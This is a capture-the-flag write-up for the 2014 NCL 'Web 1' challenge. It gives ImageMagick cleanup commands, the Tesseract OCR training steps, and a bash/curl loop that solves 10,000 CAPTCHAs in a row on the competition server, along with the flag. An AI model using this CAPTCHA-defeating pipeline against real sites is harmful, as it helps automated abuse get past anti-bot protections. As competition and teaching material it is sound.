Tag Archives: imagemagick

2014 NCL Post Season Web 1 CAPTCHA Solution

The following solution is for the 2014 NCL Post Season event’s “Web 1” flag.

Requires:
Tesseract OCR v3.02
Image Magick
CURL
Bash

On Ubuntu 14.04 the Tesseract package exists, but due to a packaging error, none of the training tools so compiling is necessary. Compiling Tesseract 3.02 from source requires also downloading and compiling Leptonica 1.70. Compiling info can be found here: https://code.google.com/p/tesseract-ocr/wiki/Compiling

Cleaning up the CAPTCHA with ImageMagick is fairly easy after discovering the dark lines and noise can be eliminated with just two commands

# remove the dark lines
convert captcha.png -opaque '#404040' cleaned_captcha.png
# remove blue noise
convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png

Now, with the image cleaned up it is time for the OCR. Tesseract with the default English training files for the CAPTCHA’s font was returning about 90-95% accuracy. This would only get you 10-20 successful results before the counter would reset back to zero with only another 9,980 to go. It is time to train Tesseract for the CAPTCHA font.

Training Tesseract OCR is a manual multiple step process if you don’t have the font. With the font available, there is an automated solution. In this case, the font didn’t want to be found. Using Image Magick’s convert utility to append 20-30 of the cleaned up CAPTCHAs vertically allows you to train the most characters at one time. The first step to training is to create a box file from a TIF of failed CAPTCHAs. I explain later how to append them together.

tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 batch.nochop makebox

Using the utility Cowboxer (works in WINE), I was able to edit the box file and fix any mistakes Tesseract made. Now it is time to train Tesseract using the corrected box file.

tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 box.train

Now it is only a matter of running several other commands and copying the combined result file to the tessdata directory. For brevity’s sake I won’t describe what the commands do. More information can be found here: https://code.google.com/p/tesseract-ocr/wiki/TrainingTesseract3

echo "captcha 0 0 0 0 0" > font_properties

unicharset_extractor eng.captcha.exp0.box

# for 2nd training session and after include previous box files
# unicharset_extractor eng.captcha.exp0.box eng.captcha.exp1.box eng.captcha.exp2.box

shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr

mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr

cntraining eng.captcha.exp0.tr

# for 2nd training session and after includes previous training files
# shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr
# mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr
# cntraining eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr

mv shapetable eng.shapetable
mv inttemp eng.inttemp
mv pffmtable eng.pffmtable
mv normproto eng.normproto
combine_tessdata eng.
cp eng.traineddata /usr/local/share/tessdata

Training Tesseract OCR with appended failed CAPTCHAs will help improve accuracy after the first training session.

# append failed CAPTCHAs vertically for training
convert failed*.png -append eng.captcha.exp0.png

# resize to 1000 pixel width while maintaining aspect ratio
convert eng.captcha.exp0.png -resize 1000 eng.captcha.exp0.tif

After a few training sessions, the CAPTCHA failures are now at a much lesser rate, but not good enough to break 10,000 consecutive correct outputs. But during training with the failures, there were no errors. To emulate that, appending of the current CAPTCHA with additional ones was necessary before running through Tesseract. Then just pipe the output through the ‘tr’ and ‘cut’ commands to get the correct output.

CAPTCHA=`cat ocr_captcha_result.txt | tr -d '\n'| tr -d ' '| cut -c 1-6`

With Tesseract trained, it is now time to automate grabbing the CAPTCHA’s and decoding them.

for i in {0..10001}
do
  if [ ${i} -lt 1 ]; then
    # start the session
    curl -b cookies.txt -c cookies.txt -k \
      --data "username=user&password=test" \
      https://23.23.158.181/signup.php
    continue;
  fi

  # submit captcha ocr value to server
  curl -b cookies.txt -c cookies.txt -k -X POST \
    --data "input=${CAPTCHA}&flag=1&submit=submit" \
    https://23.23.158.181/main.php

  # download new captcha from server
  curl -b cookies.txt -c cookies.txt -k \
    https://23.23.158.181/captcha.png > captcha.png

  # remove the dark lines
  convert captcha.png -opaque '#404040' cleaned_captcha.png

  # remove blue noise
  convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png

  # append other cleaned captchas vertically to improve ocr accuracy
  convert cleaned_captcha.png \
    additional_captcha.png \
    additional_captcha_2.png \
    -append ocr_captcha.png

  # increase size for ocr accuracy
  convert ocr_captcha.png -resize 1000 final_ocr_captcha.tif

  # run captcha through tesseract ocr
  tesseract -psm 6 final_ocr_captcha.tif ocr_captcha_result

  # clean up and grab only first captcha values
  CAPTCHA=`cat ocr_captcha_result.txt | tr -d '\n'| tr -d ' '| cut -c 1-6`
done

At this point, you should be well on your way to 10,000 consecutive CAPTCHAs form submissions. If there is any issue with training failed ones, this code added added to the form submission line should help identify and save the failed CAPTCHAs for additional training.

# submit captcha ocr value to server
curl -b cookies.txt -c cookies.txt -k -X POST \
--data "input=${CAPTCHA}&flag=1&submit=submit" \
https://23.23.158.181/main.php > flagdata.txt

if grep -Fq "You have failed" flagdata.txt
then
  echo "Failed captcha ${CAPTCHA}"

  cp captcha.png "failed-${CAPTCHA}.png"

  # will display the failed CAPTCHA using Image Magick's display command and keep the script running
  # comment this if experiencing a high failure rate
  display "failed-${CAPTCHA}.png" &
fi

The looping video below shows the 9997, 9998, 9999, and 10000 solved solution:

Flag: MyVisionIs2020

Written and Solved by Ryan Lavelle

Leave a Comment